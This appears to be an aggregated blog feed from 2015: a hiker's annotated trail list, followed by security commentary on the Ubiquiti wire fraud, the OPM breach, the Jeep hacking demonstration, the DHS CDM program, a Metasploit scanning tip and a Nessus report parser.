Details

(All visible pictures and all linked pictures are mine, save “Looking Glass”. “ON” Denotes “Over Night Trip”)

7 Lake Basin/High Divide (Sol Duc Start, ON at Hoh Lake)

Info: http://www.wta.org/go-hiking/hikes/seven-lakes-basin

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157655624635779

Notes: We started out at Sol Duc, didn’t see much the first day – heavy clouds. Descended to Hoh Lake for the night – saw my first west coast bear! – then back up and around to Sol Duc. Jogged the last few miles; loved it. Would like to head back on clearer days. Im trying to wake up early enough one day to run the whole 18 mile loop in a single day.

Appalachian Trail Sections (VA, NC, TN)

Info:

My Pictures: https://www.flickr.com/photos/sintixerr/collections/72157657260626905/

Notes: Full narrative is still being edited. List of sections can be found based on album names in Flickr collection above.

Art Loeb Trail (Small Section, NC)

Info: http://www.hikewnc.info/trailheads/pisgah-national-forest/long-distance/art-loeb-trail/

My Pictures: https://www.flickr.com/photos/sintixerr/albums/72157657035518922

Notes: Just a quick get-out-and-hike-hike post-AT

Beckler Peak

Info: http://www.wta.org/go-hiking/hikes/beckler-peak

My Pictures: None (Surprisingly?)

Notes: Easy trail for a cool view at the top. A Meetup.com hike. Not sure where my pictures of this are…

Blanca Lake

Info: http://www.wta.org/go-hiking/hikes/blanca-lake

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157656647847278

Notes: Seriously the coolest lake I’ve ever been to – and coldest I’ve ever swam in. Amazing place, tough hike, loved it. Go if you can!

Calypso Trail (MT)

Info: http://visitmt.com/listings/general/b-l-m-trail/calypso-trail.html

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157656643589080

Notes: Driving from DC to Seattle. Found this middle-of-nowhere trail right off the highway. One of the loneliest feeling places I’ve ever been…in a good way. Might have been a bit dumb driving my crappy Jeep Liberty over that bridge you see in the pictures. Alone. Twice.

Crescent Beach Trail (OR)

Info: http://alltrails.com/trail/us/oregon/crescent-beach-trail

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157650073411488

Notes: Another short hike, 90 miles west of Portland. Was my first trip to a beach you can only get to by hiking. Gorgeous beach, gorgeous day. Was held up for awhile by quite a few mountain goats taking their time munching on the trail.

Mt. Dickerman

Info: http://www.wta.org/go-hiking/hikes/mount-dickerman

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157652514230984

Notes: Last hike of the Meetup.com fitness series I was a part of. One of my favorite hikes in Washington so far, but 4000 feet-ish in 4-miles-ish makes you work for it. Still – outstanding alpine meadows, wildflowers, and amazing views.

Enchanted Valley (Twice, ON)

Info: http://www.wta.org/go-hiking/hikes/enchanted-valley

My Pictures (First Trip): https://www.flickr.com/photos/sintixerr/sets/72157653404525548

My Pictures (Second Trip): https://www.flickr.com/photos/sintixerr/sets/72157655624635779

Notes: Pics have multiple hikes mixed in them. I’ve Overnighted this trip twice. The first time, the Valley was closed so we stayed at Pyrites campsite then hiked most of the way to O’Neil Trail Junction before finding a bridge out. We turned around and headed back to Pyrites, then back to the TH the third day. The second trip we stayed in O’Neil Creek on night 1 then the Valley night 2, where we saw a bear fairly up close. My foot went out, so we ended up not going further again. I will get up that mountain to Anderson Glacier!

Heather Lake

Info: http://www.wta.org/go-hiking/hikes/heather-lake-1

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157649754945494

Notes: Cute Lake. Pretty easy lake to hike to. Recommend J

Hoh Rain Forest River Trail (to Olympic Ranger Station, ON)

Info: http://www.wta.org/go-hiking/hikes/hoh-river-elk-lake

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157654176106783

Notes: Hikes through the Hoh Rainforest in a one-nighter. Stayed at the Olympic Ranger station, but made it another ¾ mile or so – and that last ¾ mile absolutely made the whole hike worth it.. Some of the prettiest, most magical, scenes I’ve ever been in. A walk through an enchanted tunnel with a couple of deer was particularly surreal. As were the faeries that came out of the log.

Huntoon Point (Snowshoe via Artist’s Point)

Info: http://www.wta.org/go-hiking/hikes/huntoon-point

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157651366650818

Notes: This was my first “real” snowshoe and it was hard! But I was with some Mountaineers and our group was the one that didn’t turn around. Good for us because I’ve never ever been in such grand, amazing surroundings. Certainly not in the snow; too much Florida in my youth. Some of the best pictures Ive taken of the outdoors – they’re glorious.

Looking Glass Rock (NC)

Info: http://www.romanticasheville.com/looking_glass.htm

My Pictures: Somewhere, still looking, so here are someone else’s:

http://www.main.nc.us/naturenotebook/hikes/pix/lookingglassrock.JPG

Notes: This was a quick fun post-AT hike while I was decompressing in Asheville (go AirBnB!). Cool looking mountain-stub-rounded-cliff-face-thing.

Marmot Pass (ON)

Info: http://www.wta.org/go-hiking/hikes/marmot-pass-upper-big-quilcene

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157649736351794

Notes: Led an overnight Meetup trip myself with a couple of guys I didn’t know. Got there earlier than expected and it was colder than expected. Not as cool as I thought it would be, although it was certainly gorgeous. On my list to return to this summer to go explore some of the connecting trails.

Ollalie/Talapus Lakes

Info: http://www.wta.org/go-hiking/hikes/talapus-lake

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157648770946943

Notes: One of the Meetup.com fitness series hikes. Snow. :)

Oyster Dome (Most)

Info: http://www.wta.org/go-hiking/hikes/oyster-dome

My Pictures: None

Notes: Didn’t quite make it to the top; it was terrible weather and nothing to see. We could’ve kept going, we just didn’t care. One of the Meetup.com fitness series hikes.

Mt. Pilchuck (Twice)

Info: http://www.wta.org/go-hiking/hikes/mount-pilchuck

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157653404525548

Notes: First trip I only made it about 2/3 of the way up. It was a fitness-building hike, I had 30lbs on by back, and hadn’t slept in almost a week. The second time I came back with my sister and her boyfriend and made it to the top and it was a lot easier and more fun than the first time (note: not the lookout, I didn’t feel up to scrambling)

Shi Shi Beach (Twice)

Info: http://www.wta.org/go-hiking/hikes/north-shi-shi-access

My Pictures (first trip): https://www.flickr.com/photos/sintixerr/sets/72157650798832336

My Pictures (second trip): https://www.flickr.com/photos/sintixerr/sets/72157655624635779

Notes: First time was a meetup hike – my first in Washington State! We ended up walking back and forth along the beach several times – plus bushwhacked down a very old mining path to a lake deep into the woods (hence the trip length). TONS of coastal life everywhere. Second trip was with a friend and we spent a lot of time watching Seals.

Snow Lake (Twice: Winter Snow, Summer Dry)

Info: http://www.wta.org/go-hiking/hikes/snow-lake-1

My Pictures (snow trip): https://www.flickr.com/photos/sintixerr/albums/72157650597387518

My Pictures (summer trip): https://www.flickr.com/photos/sintixerr/sets/72157656212384548

Notes: Did Snow Lake twice. The first time was in the winter in snow with microspikes. It was actually pretty easy – deceptively so. Going back, I took a first time hiker (old friend) who had a pretty tough time with the trail; it was way rockier and exposed to sun and heat than I remembered

South Lost Lake (Not)

Info: http://www.wta.org/go-hiking/hikes/south-lost-lake-trail

My Pictures: None

Notes: I actually don’t know where we ended up hiking; our hike leader couldn’t find the right trailhead. J Lost Lake remained lost.

Surprise Lake

Info: http://www.wta.org/go-hiking/hikes/surprise-lake-1

My Pictures: None

Notes: I’ve been told I was on this hike. I don’t remember it. Wait…I think it rained. A lot. Till we were soaked through our heaviest rain gear. Ugh. This is why I try not to remember it.

Thunder Creek (Far, ON)

Info: http://www.wta.org/go-hiking/hikes/thunder-creek-1

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157652334533772

Notes: Not as many classically scenic viewpoints as many other hikes, but it was really enjoyable – both the scenery and company. (I led several Meetup folks on this trip.) We went past the standard WTA hike, but I cant quite recall where we stopped, except it was about 10.2 miles in. We didn’t do 4^th of July pass or whatever.

Tiger Mountain #3

Info: http://www.wta.org/go-hiking/hikes/west-tiger-3

My Pictures: Totally not worth it

Notes: Just a training hike alone. It was boring as sin. Got a decent distance up then just stopped and came back.

Trillium Lake Snowshoe

Info: http://www.fs.usda.gov/recarea/mthood/null/recarea/?recid=53514&actid=91

My Pictures: https://www.flickr.com/photos/sintixerr/albums/72157657342434570

Notes: This was a super easy snowshoe that I really screwed up and almost died during. It was flat and sunny out when I left, but I wore jeans, didn’t have a headlamp, and didn’t have a map – it was a circle after all – and it was my first snowshoe ever. It rained. Then it snowed. And it was getting dark. I was getting really cold and there were two exit options, both far, and one led to my car. I guessed and picked right.

Upper Lena Lake

Info: http://www.wta.org/go-hiking/hikes/upper-lena-lake

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157653060933235

Notes: I almost died on this hike; really close. Fell off a ledge/stream/waterfall. Was inches from falling 40 feet.. landed 4 feet down instead. Beautiful area, but still feel sketch about going back. If it’s been wet out in the area, several areas are pretty tough. Went with two friends.

Yellowstone (Somewhere?)

Info:NA

My Pictures: https://www.flickr.com/photos/sintixerr/sets/72157653404525548

Notes: A random hike in Yellowstone. Was pretty, but the PNW has this particular hike beat on all accounts, even if the threat of grizzlies does add an edge. We did see 10’s of prairie dogs in one area and some geese being hysterical. Oh..and a lone wolf! Was with my sister and her boyfriend.

Filed under: Backpacking, Personal Tagged: Appalachian Trail, backpacking, beaches, hiking, long distance, Montana, mountains, North Carolina, Olympic Mountains, PNW, short, Virginia, Washington State, wilderness

Metasploit + VHOSTS in mass

noreply@blogger.com (CG) — Tue, 18 Aug 2015 15:48:00 +0000

maybe this was a solved problem but I couldn't find a solution online.

Problem #1:

Metasploit RHOSTS takes the file parameter so you can pass in a list of ip ranges. It will also take hostnames as long as they resolve. If you have giant list of stuff and one of them doesn't resolve then the RHOSTS wont load and you'll want to cry.

Problem #2:
Lots of proxy/WAFs/websites in general require the VHOST to be set. Metasploit ships with tons of great auxiliary modules for http stuff but there isn't really a nice way to load a list of VHOSTS along with the list of IPs.

Solution:
Resource scripts to the rescue! A simple read file and setting RHOST and VHOST for each attempt at an aux module seems to get it done. I've created a gist with the script. Wait, what about Problem #1? The module will just error out on the single RHOST that doesn't resolve and just move on. Now you can have a file full of stuff that doesn't resolve mixed in with stuff that does and it should plow on through. :-)

Resource script to get it done
https://gist.github.com/carnal0wnage/1c4e34af21acb679641a

-CG

Effect of Hacking on Stock Price, Or Not?

Richard Bejtlich — Fri, 07 Aug 2015 20:19:00 +0000

I read Brian Krebs story Tech Firm Ubiquiti Suffers $46M Cyberheist just now. He writes:

Ubiquiti, a San Jose based maker of networking technology for service providers and enterprises, disclosed the attack in a quarterly financial report filed this week [6 August; RMB] with the U.S. Securities and Exchange Commission (SEC). The company said it discovered the fraud on June 5, 2015, and that the incident involved employee impersonation and fraudulent requests from an outside entity targeting the company’s finance department.

“This fraud resulted in transfers of funds aggregating $46.7 million held by a Company subsidiary incorporated in Hong Kong to other overseas accounts held by third parties,” Ubiquiti wrote. “As soon as the Company became aware of this fraudulent activity it initiated contact with its Hong Kong subsidiary’s bank and promptly initiated legal proceedings in various foreign jurisdictions. As a result of these efforts, the Company has recovered $8.1 million of the amounts transferred.”

Brian credits Brian Honan at CSO Online, with noticing the disclosure yesterday.

This is a terrible crime that I would not wish upon anyone. My interest in this issue has nothing to do with Ubiquiti as a company, nor is it intended as a criticism of the company. The ultimate fault lies with the criminals who perpetrated this fraud. The purpose of this post is to capture some details for the benefit of analysis, history, and discussion.

The first question I had was: did this event have an effect on the Ubiquiti stock price? The FY fourth quarter results were released at 4:05 pm ET on Thursday 6 August 2015, after the market closed.

The "Fourth Quarter Financial Summary: listed this as the last bullet:

"GAAP net income and diluted EPS include a $39.1 million business e-mail compromise ("BEC") fraud loss as disclosed in the Form 8-K filed on August 6, 2015"

I assume the Form 8-K was published simultaneously, with earnings.

Next I found the following in this five day stock chart.

5 day UBNT Chart (3-7 August 2015)

You can see the gap down from Thursday's closing price, on the right side of the chart. Was that caused by the fraud charge?

I looked to see what the financial press had to say. I found this Motley Fool article titled Why Ubiquiti Networks, Inc. Briefly Fell 11% on Friday, posted at 12:39 PM (presumably ET). However, this article had nothing to say about the fraud.

Doing a little more digging, I saw Seeking Alpha caught the fraud immediately, posting Ubiquiti discloses $39.1M fraud loss; shares -2.9% post-earnings at 4:24 PM (presumably ET). They noted that "accounting chief Rohit Chakravarthy has resigned." I learned that the company was already lacking a chief financial officer, so Mr. Chakravarthy was filling the role temporarily. Perhaps that contributed to the company falling victim to the ruse. Could Ubiquiti have been targeted for that reason?

I did some more digging, but it looks like the popular press didn't catch the issue until Brian Honan and Brian Krebs brought attention to the fraud angle of the earnings release, early today.

Next I listened to the archive of the earnings call. The call was a question-and-answer session, rather than a statement by management followed by Q and A. I listened to analysts ask about head count, South American sales, trademark names, shipping new products, and voice and video. Not until the 17 1/2 minute mark did an analyst ask about the fraud.

CEO Robert J. Pera said he was surprised no one had asked until that point in the call. He said he was embarrassed by the incident and it reflected "incredibly poor judgement and incompetence" by a few people in the accounting department.

Finally, returning to the stock chart, you see a gap down, but recovery later in the session. The market seems to view this fraud as a one-time event that will not seriously affect future performance. That is my interpretation, anyway. I wish Ubiquiti well, and I hope others can learn from their misfortune.

Update: I forgot to add this before hitting "post":

Ubiquiti had FY fourth quarter revenues of $145.3 million. The fraud is a serious portion of that number. If Ubiquiti had earned ten times that in revenue, or more, would the fraud have required disclosure?

The disclosure noted:

"As a result of this investigation, the Company, its Audit Committee and advisors have concluded that the Company’s internal control over financial reporting is ineffective due to one or more material weaknesses."

That sounds like code for a Sarbanes-Oxley issue, so I believe they would have reported anyway, regardless of revenue-to-fraud proportions.

Mozilla Delphi Project (I took part)

Wed, 29 Jul 2015 16:00:46 +0000

So the results of the Mozilla Delphi project are out. I was one of the panelists – alongside some pretty well known names like Jane Hall Lute, Bruce Schneier, and some other big etc.’s. You can find it here:

https://blog.mozilla.org/netpolicy/files/2015/07/Mozilla-Cybersecurity-Delphi-1.0.pdf

And some background here:

https://wiki.mozilla.org/Netpolicy/Cybersecurity_Delphi#Report_Now_Published

“Mozilla’s Cybersecurity Delphi 1.0 is a step to address this gap, by identifying and prioritizing concrete threats and solutions. Through the iterative structure of the Delphi method, we will build expert consensus about the priorities for improving the security of the Internet—infrastructure to protect public safety, sustain economic growth, and foster innovation. The Delphi method offers unique benefits in this context because it aggregates the input of a diverse, broad set of voices, using a discrete and defined process with a clear, fixed end point and a mechanism for non-attribution to encourage open and through engagement. “

Im still processing the results, many of which I adamantly disagree with, but what I think the report mainly shows is that “cybersecurity” isn’t a thing that exists outside of specific sets of contexts and perspectives and goals. It just goes…poof…and disappears as a concept if it’s not bracketed by material constraints. The all over the board nature of the responses seems to demonstrate that (even though Mozilla did a good job creating a narrative around them).

That said, I think there are some interesting points in the document and that it’s worth a read – at the very least you’ll get to see some of the filter biases of some very smart people (obviously including my own). And those are worth knowing, because very often our human fears and backgrounds and perceptions are not reflective of actual risks and needs.

Filed under: Critical Infrastructure Protection, Cybersecurity General, Risk Management Theory Tagged: cybersecurity of the internet, Information Security, mozilla delphi project, summary

Going Too Far to Prove a Point

Richard Bejtlich — Tue, 21 Jul 2015 09:45:00 +0000

I just read Hackers Remotely Kill a Jeep on the Highway - With Me in It by Andy Greenberg. It includes the following:

"I was driving 70 mph on the edge of downtown St. Louis when the exploit began to take hold...

To better simulate the experience of driving a vehicle while it’s being hijacked by an invisible, virtual force, Miller and Valasek refused to tell me ahead of time what kinds of attacks they planned to launch from Miller’s laptop in his house 10 miles west. Instead, they merely assured me that they wouldn’t do anything life-threatening. Then they told me to drive the Jeep onto the highway. “Remember, Andy,” Miller had said through my iPhone’s speaker just before I pulled onto the I-40 on-ramp, “no matter what happens, don’t panic.”

As the two hackers remotely toyed with the air-conditioning, radio, and windshield wipers, I mentally congratulated myself on my courage under pressure. That’s when they cut the transmission.

Immediately my accelerator stopped working. As I frantically pressed the pedal and watched the RPMs climb, the Jeep lost half its speed, then slowed to a crawl. This occurred just as I reached a long overpass, with no shoulder to offer an escape. The experiment had ceased to be fun.

At that point, the interstate began to slope upward, so the Jeep lost more momentum and barely crept forward. Cars lined up behind my bumper before passing me, honking. I could see an 18-wheeler approaching in my rearview mirror. I hoped its driver saw me, too, and could tell I was paralyzed on the highway.

“You’re doomed!” Valasek shouted, but I couldn’t make out his heckling over the blast of the radio, now pumping Kanye West. The semi loomed in the mirror, bearing down on my immobilized Jeep.

I followed Miller’s advice: I didn’t panic. I did, however, drop any semblance of bravery, grab my iPhone with a clammy fist, and beg the hackers to make it stop...

After narrowly averting death by semi-trailer, I managed to roll the lame Jeep down an exit ramp, re-engaged the transmission by turning the ignition off and on, and found an empty lot where I could safely continue the experiment." (emphasis added)

I had two reactions to this article:

1. It is horrifying that hackers can remotely take control of a vehicle. The auto industry has a lot of work to do. It's unfortunate that it takes private research and media attention to force a patch (which has now been published.) Hopefully a combination of Congressional attention, product safety laws, and customer pressure will improve the security of the auto industry before lives and property are affected.

2. It is also horrifying to conduct a hacking "experiment" on I-40, with vehicles driving at 60 or more MPH, carrying passengers. It's not funny to put lives at risk, whether they are volunteers like the driver/author or other people on the highway.

Believing it is ok reflects the same juvenile thinking that motivated another "researcher," Chris Roberts, to apparently "experiment" with live airplanes, as reported by Wired and other news outlets.

Hackers are not entitled to jeopardize the lives of innocent people in order to make a point. They can prove their discoveries without putting others, who have not consented to be guinea pigs, at risk.

It would be a tragedy if the first death by physical-digital convergence occurs because a "security researcher" is "experimenting" in order to demonstrate a proof of concept.

Norse Dark Matters: "It's Time to Kill the General Purpose Browser"

Ben Tomhave — Thu, 16 Jul 2015 19:49:31 +0000

I contributed a piece to the Norse Security Dark Matters blog a few weeks back.

It's Time to Kill the General Purpose Browser
Another week, another critical Adobe Flash vulnerability (CVE-2015-3113), complete with active exploit in the wild. Adobe encourages everyone to patch right away, but is there more you should do?

In fact, here in 2015, with a constant stream of broken apps, broken browser, broken plugins, and breach after breach after breach, I'm left to wonder: Why are we still using general purpose browsers at all anymore? Are they, and their associated plugins, doing more harm than good?

Continue reading here...

The Sad Hard Truth

Tue, 07 Jul 2015 16:14:06 +0000

Today I saw an announcement for another cybersecurity leadership council filled with the usual suspects:

https://www.uschamber.com/press-release/us-chamber-announces-launch-cybersecurity-leadership-council?utm_source=Facebook&utm_medium=Wallpost&utm_campaign=Status

“When it comes to the cybersecurity of our networks, the private sector has the capabilities and the market has produced good solutions. Now we need to focus on mitigation of cyber risks through cross-sector information sharing efforts, public and private partnerships, and the improvement of cyber hygiene of businesses of all sizes,” said Howard Schmidt, a partner at Ridge-Schmidt Cyber, and chairman of the council.

Sigh. Let me give this to you all straight:

First, our cybersecurity exposure is fundamentally created by how businesses go about making money. It’s about corporate discipline, perception, culture, value chains, investment strategies, procurement, marketing, communication, trust, operational quality, etc. Cybersecurity state is NOT primarily a function of anything that happens in a CISO’s office, It has very little to do with Information Sharing (as typically defined in this conversation), and Public Private Partnership success depends on having some sort of comprehensive problem space model which precedes conclusions (and the language provided starts with conclusions without a consensus problem space model anywhere).

CISO’s activities are done as a result of a business’s actual exposure – created OUTSIDE of the CISO’s office – business perception of its risk – created by its culture – and actual threat actors – which neither the business nor the CISO’s office directly controls. Therefore any conversation or effort centered on how to do “Cybersecurity” better will, almost by definition, fail. “Cybersecurity”, if defined as “activities centered around the CISO’s office and levers to enable the CISO’s office”, has little to no influence or control over the business risk level created by ICT (Internet Connected Technology) use because it neither controls nor influences ANY of the primary environmental factors.

The problem is, since coordinating solutions on the non-CISO’s office problem space (exposure creation) requires dealing directly with how businesses make money, it’s a really tough nut to crack (legally, politically, financially, culturally, etc) and few are willing to do it. It’s MUCH easier to focus on the CISO’s office – even at the expense of success. And, besides, we have a whole security industry telling us that another box or service will solve the problem. (For those not following along, what they mean by “solve the problem” is “hold the line until you slowly drown in the cascading consequences of rising complex conflict interactions online”)

Further, technically, even if we did move the conversation to “how we do business in general and how that creates exposure” – which NONE of the language around the new group even smells like it might be saying – the way we build IT and OT infrastructure is not securable to the level we desire it to be for the cost we wish to pay. Full stop. This is not a “security” problem, this is a mathematical complexity problem that has to do with error rate and organizational competency across time and disciplines. Moving further on “cybersecurity” without changing the surrounding technical environment – transformationally, not evolutionarily – is an abject waste of time.

Anyone telling you different is selling you something, ignorant, or has unfortunate perspective blinders on.

Filed under: Uncategorized

My Security Strategy: The "Third Way"

Richard Bejtlich — Tue, 30 Jun 2015 15:23:00 +0000

Over the last two weeks I listened to and watched all of the hearings related to the OPM breach. During the exchanges between the witnesses and legislators, I noticed several themes. One presented the situation facing OPM (and other Federal agencies) as confronting the following choice:

You can either 1) "secure your network," which is very difficult and going to "take years," due to "years of insufficient investment," or 2) suffer intrusions and breaches, which is what happened to OPM.

This struck me as an odd dichotomy. The reasoning appeared to be that because OPM did not make "sufficient investment" in security, a breach was the result.

In other words, if OPM had "sufficiently invested" in security, they would not have suffered a breach.

I do not see the situation in this way, for two main reasons.

First, there is a difference between an "intrusion" and a "breach." An intrusion is unauthorized access to a computing resource. A breach is the theft, alteration, or destruction of that computing resource, following an intrusion.

It therefore follows that one can suffer an intrusion, but not suffer a breach.

One can avoid a breach following an intrusion if the security team can stop the adversary before he accomplishes his mission.

Second, there is no point at which any network is "secure," i.e., intrusion-proof. It is more likely one could operate a breach-proof network, but that is not completely attainable, either.

Still, the most effective strategy is a combination of preventing as many intrusions as possible, complemented by an aggressive detection and response operation that improves the chances of avoiding a breach, or at least minimizes the impact of a breach.

This is why I call "detection and response" the "third way" strategy. The first way, "secure your network" by making it "intrusion-proof," is not possible. The second way, suffer intrusions and breaches, is not acceptable. Therefore, organizations should implement a third way strategy that stops as many intrusions as possible, but detects and responds to those intrusions that do occur, prior to their progression to breach status.

My Prediction for Top Gun 2 Plot

Richard Bejtlich — Tue, 30 Jun 2015 11:01:00 +0000

We've known for about a year that Tom Cruise is returning to his iconic "Maverick" role from Top Gun, and that drone warfare would be involved. A few days ago we heard a few more details in this Collider story:

[Producer David Ellison]: There is an amazing role for Maverick in the movie and there is no Top Gun without Maverick, and it is going to be Maverick playing Maverick. It is I don’t think what people are going to expect, and we are very, very hopeful that we get to make the movie very soon. But like all things, it all comes down to the script, and Justin is writing as we speak.

[Interviewer]; You’re gonna do what a lot of sequels have been doing now which is incorporate real use of time from the first one to now.

ELLISON and DANA GOLDBERG: Absolutely...

ELLISON: As everyone knows with Tom, he is 100% going to want to be in those airplanes shooting it practically. When you look at the world of dogfighting, what’s interesting about it is that it’s not a world that exists to the same degree when the original movie came out. This world has not been explored. It is very much a world we live in today where it’s drone technology and fifth generation fighters are really what the United States Navy is calling the last man-made fighter that we’re actually going to produce so it’s really exploring the end of an era of dogfighting and fighter pilots and what that culture is today are all fun things that we’re gonna get to dive into in this movie.

What could the plot involve?

First, who is the adversary? You can't have dogfighting without a foe. Consider the leading candidates:

Russia: Maybe. Nobody is fond of what President Putin is doing in Ukraine.
Iran: Possible, but Hollywood types are close to the Democrats, and they will not likely want to upset Iran if Secretary Kerry secures a nuclear deal.
China: No way. Studios want to release movies in China, and despite the possibility of aerial conflict in the East or South China Seas, no studio is going to make China the bad guy. In fact, the studio will want to promote China as a good guy to please that audience.
North Korea: No way. Prior to "The Interview," this was a possibility. Not anymore!

My money is on an Islamic terrorist group, either unnamed, or possibly Islamic State. They don't have an air force, you say? This is where the drone angle comes into play.

Here is my prediction for the Top Gun 2 plot.

Oil tankers are trying to pass through the Gulf of Aden, or maybe the Strait of Hormuz, carrying their precious cargo. Suddenly a swarm of small, yet armed, drones attack and destroy the convoy, setting the oil ablaze in a commercial and environmental disaster. The stock market suffers a huge drop and gas prices skyrocket.

The US Fifth Fleet, and its Chinese counterpart, performing counter-piracy duties nearby, rush to rescue the survivors. They set up joint patrols to guard other commercial sea traffic. Later the Islamic group sends another swarm of drones to attack the American and Chinese ships. This time the enemy includes some sort of electronic warfare-capable drones that jam US and Chinese GPS, communications, and computer equipment. (I'm seeing a modern "Battlestar Galactica" theme here.) American and Chinese pilots die, and their ships are heavily damaged. (By the way, this is Hollywood, not real life.)

The US Navy realizes that its "net-centric," "technologically superior" force can't compete with this new era of warfare. Cue the similarities with the pre-Fighter Weapons School, early Vietnam situation described in the first scenes at Miramar in the original movie. (Remember, a 12-1 kill ratio in Korea, 3-1 in early Vietnam due to reliance on missiles and atrophied dogfighting skills, back to 12-1 in Vietnam after Top Gun training?)

The US Navy decides it needs to bring back someone who thinks unconventionally in order to counter the drone threat and resume commercial traffic in the Gulf. They find Maverick, barely hanging on to a job teaching at a civilian flight school. His personal life is a mess, and he was kicked out of the Navy during the first Gulf War in 1991 for breaking too many rules. Now the Navy wants him to teach a new generation of pilots how to fight once their "net-centric crutches" disappear.

You know what happens next. Maverick returns to the Navy as a contractor. Top Gun is now the Naval Strike and Air Warfare Center (NSAWC) at NAS Fallon, Nevada. The Navy retired his beloved F-14 in 2006, so there is a choice to be made about what aircraft awaits him in Nevada. I see three possibilities:

1) The Navy resurrects the F-14 because it's "not vulnerable" to the drone electronic warfare. This would be cool, but they aren't going to be able to fly American F-14s due to their retirement. CGI maybe?

2) The Navy flies the new F-35, because it's new and cool. However, the Navy will probably not have any to fly. CGI again?

3) The Navy flies the F-18. This is most likely, because producers could film live operations as they did in the 1980s.

Beyond the aircraft issues, I expect themes involving relevance as one ages, re-integration with military culture, and possibly friction between members of the joint US-China task force created to counter the Islamic threat.

In the end, thanks to the ingenuity of Maverick's teaching and tactics, the Americans and Chinese prevail over the Islamic forces. It might require Maverick to make the ultimate sacrifice, showing he's learned that warfare is a team sport, and that he really misses Goose. The Chinese name their next aircraft carrier the "Pete Mitchell" in honor of Maverick's sacrifice. (Forget calling it the "Maverick" -- too much rebellion for the CCP.)

I'm looking forward to this movie.

XMLCompTable2 - Now with details!

Jason Oliver — Mon, 29 Jun 2015 17:38:00 +0000

Code:
https://github.com/JasonMOliver/Java_Parsers/blob/master/XMLCompTable2.java

It has been a while between creating code to work with Nessus but I recently had a need to run CIS benchmarks that had not been edited to match a local security policy.

Due to this I had a need to see not only the default pass and fail but what the scanner found when scanning when the scanner identified a Pass and Fail.

The output looks something like the following; Machines on the top axis and tests on the side axis.

To run the command as always;

java -Xmx1g XMLCompTable2 *.nessus > output.[html/xls]

To get the best value out of this scan and parse one baseline at a time (i.e. All Windows 2008, All Windows 7, All Redhat, etc.)

cheers

JSN

Hearing Witness Doesn't Understand CDM

Richard Bejtlich — Sat, 27 Jun 2015 11:50:00 +0000

This post is a follow up to this post on CDM. Since that post I have been watching hearings on the OPM breach.

On Wednesday 24 June a Subcommittee of the House Committee on Homeland Security held a hearing titled DHS’ Efforts to Secure .Gov.

A second panel (starts in the Webcast around 2 hours 20 minutes) featured Dr. Daniel M. Gerstein, a former DHS official now with RAND, as its sole witness.

During his opening statement, and in his written testimony, he made the following comments:

"The two foundational programs of DHS’s cybersecurity program are EINSTEIN (also called EINSTEIN 3A) and CDM. These two systems are designed to work in tandem, with EINSTEIN focusing on keeping threats out of federal networks and CDM identifying them when they are inside government networks.

EINSTEIN provides a perimeter around federal (or .gov) users, as well as select users in the .com space that have responsibility for critical infrastructure. EINSTEIN functions by installing sensors at Web access points and employs signatures to identify cyberattacks.

CDM, on the other hand, is designed to provide an embedded system of sensors on internal government networks. These sensors provide real-time capacity to sense anomalous behavior and provide reports to administrators through a scalable dashboard. It is composed of commercial-off-the-shelf equipment coupled with a customized dashboard that can be scaled for administrators at each level." (emphasis added)

All of the text in bold is false. CDM is not "identifying [threats] when they are in inside government networks." CDM is not "an embedded system of sensors on internal government networks" looking for threat actors.

Why does Dr. Gerstein so misunderstand the CDM program? The answer is found in the next section of his testimony, reproduced below.

"CDM operates by providing

   federal departments and agencies with capabilities and tools that identify
       cybersecurity risks on an ongoing basis, prioritize these risks based upon
       potential impacts, and enable cybersecurity personnel to mitigate the
       most significant problems first. Congress established the CDM program
       to provide adequate, risk-based, and cost-effective cybersecurity and
       more efficiently allocate cybersecurity resources." (emphasis added)

The indented section is reproduced from the DHS CDM Website, as footnoted in Dr. Gerstein's statement.

The answer to my question of misunderstanding involves two levels of confusion.

The first level of confusion is a result of the the CDM description, which confuses risks with vulnerabilities. Basically, the CDM description should say vulnerabilities instead of risks. CDM, now known as Continuous Diagnostics and Mitigation, is a "find and fix flaws (i.e., vulnerabilities) faster" program.

In other words, the CDM description should say:

"CDM gives federal departments and agencies with capabilities and tools that identify cybersecurity vulnerabilities on an ongoing basis, prioritize these vulnerabilities based upon potential impacts, and enable cybersecurity personnel to mitigate the most significant problems first."

The second level of confusion is a result of Dr. Gerstein confusing risks with threats. It is clear that when Dr. Gerstein reads the CDM description and its mention of "risks," he thinks CDM is looking for threat actors. CDM does not look for threat actors; CDM looks for vulnerabilities. Vulnerabilities are flaws in software or configuration that make it possible for intruders to gain unauthorized access.

As I wrote in my CDM post, we absolutely need the capability to find and fix flaws faster. We need CDM. However, do not confuse CDM with the operational capability to detect and remove threat actors. CDM could be deployed across the entire Federal government, but it would be an accident if a security analyst noticed an intruder using a CDM tool.

Essentially, the government needs to implement My Federal Government Security Crash Program to detect and remove threat actors.

It is critical that staffers, lawmakers, and the public understand what is happening, and not be lulled into a false sense of security due to misunderstanding these concepts.

Calling Shenanigans on all the OPM Breach Hate Threads

Tue, 23 Jun 2015 02:46:18 +0000

I wrote the following up in response to a mailing list thread on some sort of anti-OPM petition campaign. I think the original email and a subsequent follow-up from me to a bunch of replies deserve repeating here:

Part 1:

I’m calling shenanigans. Why are we picking on OPM???

We’re seeing numbers like “76% of organizations breached in past 12
months”. Or “97% of networks have been breached” etc (the numbers are
coming from all over – and back up anecdotal evidence – so whichever
source you do or don’t believe, it’s still “a whole damn lot”).

Many of these organizations do have sucky security. Many … do not.
Many are, actually, pretty good at it.

What does this mean? It means that, in today’s world, keeping your
network clean, over time, is next to impossible. It requires a level
of competency and diligence that few organizations have in any other
respect than their core business competencies. It also means that
bemoaning the state of government cybersecurity over that of private
industry cybersecurity is just…talk. *Everyone* is getting owned,
at some point or another.

Publicly flaying OPM does absolutely nothing good and it harms our
collective ability to get better in the future.

How/Why?

